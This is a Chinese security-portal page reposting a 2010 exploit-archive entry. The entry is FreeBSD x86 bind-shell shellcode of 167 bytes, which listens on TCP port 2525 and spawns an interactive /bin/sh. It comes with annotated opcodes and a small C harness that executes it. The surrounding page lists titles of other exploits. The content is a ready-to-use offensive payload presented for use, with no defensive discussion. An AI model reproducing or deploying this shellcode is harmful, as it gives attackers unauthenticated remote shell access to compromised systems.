首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
bsd/x86-bindshell on port 2525 shellcode 167 bytes
来源:beosroot@hotmail.fr 作者:beosroot 发布时间:2010-08-30  
/*
-------------- bds/x86-bindshell on port 2525 167 bytes -------------------------
*  AUTHOR : beosroot
*   OS    : BSDx86 (Tested on FreeBSD)
*   EMAIL : beosroot@hotmail.fr
             beosroot@null.net
*  GR33TZ To : joseph-h, str0ke, MHIDO55,.....
*/

const char shellcode[] =
    "\x6a\x00"                  // push   $0x0
    "\x6a\x01"                  // push   $0x1
    "\x6a\x02"                  // push   $0x2
    "\x50"                      // push   %eax
    "\x6a\x61"                  // push   $0x61
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x50"                      // push   %eax
    "\x6a\x00"                  // push   $0x0
    "\x6a\x00"                  // push   $0x0
    "\x6a\x00"                  // push   $0x0
    "\x6a\x00"                  // push   $0x0
    "\x68\x10\x02\x09\xdd"      // push   $0xdd090210
    "\x89\xe0"                  // mov    %esp,%eax
    "\x6a\x10"                  // push   $0x10
    "\x50"                      // push   %eax
    "\xff\x74\x24\x1c"          // pushl  0x1c %esp
    "\x50"                      // push   %eax
    "\x6a\x68"                  // push   $0x68
    "\x58"                      // pop    $eax
    "\xcd\x80"                  // int    $0x80
    "\x6a\x01"                  // push   $0x1
    "\xff\x74\x24\x28"          // pushl  0x28 %esp
    "\x50"                      // push   %eax
    "\x6a\x6a"                  // push   $0x6a
    "\x58"                      // pop    $eax
    "\xcd\x80"                  // int    $0x80
    "\x83\xec\x10"              // sub    $0x10,$esp
    "\x6a\x10"                  // push   $0x10
    "\x8d\x44\x24\x04"          // lea    0x4%esp,%eax
    "\x89\xe1"                  // mov    %esp,%ecx
    "\x51"                      // push   %ecx
    "\x50"                      // push   %eax
    "\xff\x74\x24\x4c"          // pushl  0x4c %esp
    "\x50"                      // push   %eax
    "\x6a\x1e"                  // push   %0x1e
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x50"                      // push   %eax
    "\xff\x74\x24\x58"          // pushl  0x58 %esp
    "\x50"                      // push   %eax
    "\x6a\x06"                  // push   $0x6
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x6a\x00"                  // push   $0x0
    "\xff\x74\x24\x0c"          // pushl  0xc %esp
    "\x50"                      // push   %eax
    "\x6a\x5a"                  // push   $0x5a
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x6a\x01"                  // push   $0x1
    "\xff\x74\x24\x18"          // pushl  0x18 %esp
    "\x50"                      // push   %eax
    "\x6a\x5a"                  // push   $0x5a
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x6a\x02"                  // push   $0x2
    "\xff\x74\x24\x24"          // pushl  0x24 %esp
    "\x50"                      // push   %eax
    "\x6a\x5a"                  // push   $0x5a
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x68\x73\x68\x00\x00"      // push   $0x6873
    "\x89\xe0"                  // mov    %esp,%eax
    "\x68\x2d\x69\x00\x00"      // push   $0x692d
    "\x89\xe1"                  // mov    %esp,%ecx
    "\x6a\x00"                  // push   $0x0
    "\x51"                      // push   %ecx
    "\x50"                      // push   %eax
    "\x68\x2f\x73\x68\x00"      // push   $0x68732f
    "\x68\x2f\x62\x69\x6e"      // push   $0x6e69622f
    "\x89\xe0"                  // mov    %esp,%eax
    "\x8d\x4c\x24\x08"          // lea    0x8 %esp,%ecx
    "\x6a\x00"                  // push   $0x0
    "\x51"                      // push   %ecx
    "\x50"                      // push   %eax
    "\x50"                      // push   %eax
    "\x6a\x3b"                  // push   $0x3b
    "\x58"                      // pop    %eax
    "\xcd\x80";                 // int    $0x80

int main() {

    void (*hell)() = (void *)shellcode;
    return (*(int(*)())shellcode)();

}



// the end o.O


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SnackAmp 3.1.2 Malicious WAV B
·Mozilla Firefox 3.6.8 Adobe Re
·SnackAmp 3.1.2 Malicious SMP B
·Microsoft Windows wscript.exe
·nginx v0.6.38 Heap Corruption
·flash player 9.exe DLL Hijacki
·Blogman v0.7.1 (profile.php) S
·Camtasia Studio 7 (mfc90enu.dl
·Leadtools ActiveX Raster Twain
·Microsoft Windows Based Script
·McAfee LinuxShield <= 1.5.1 Lo
·web wiz newspad v1.03 Database
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved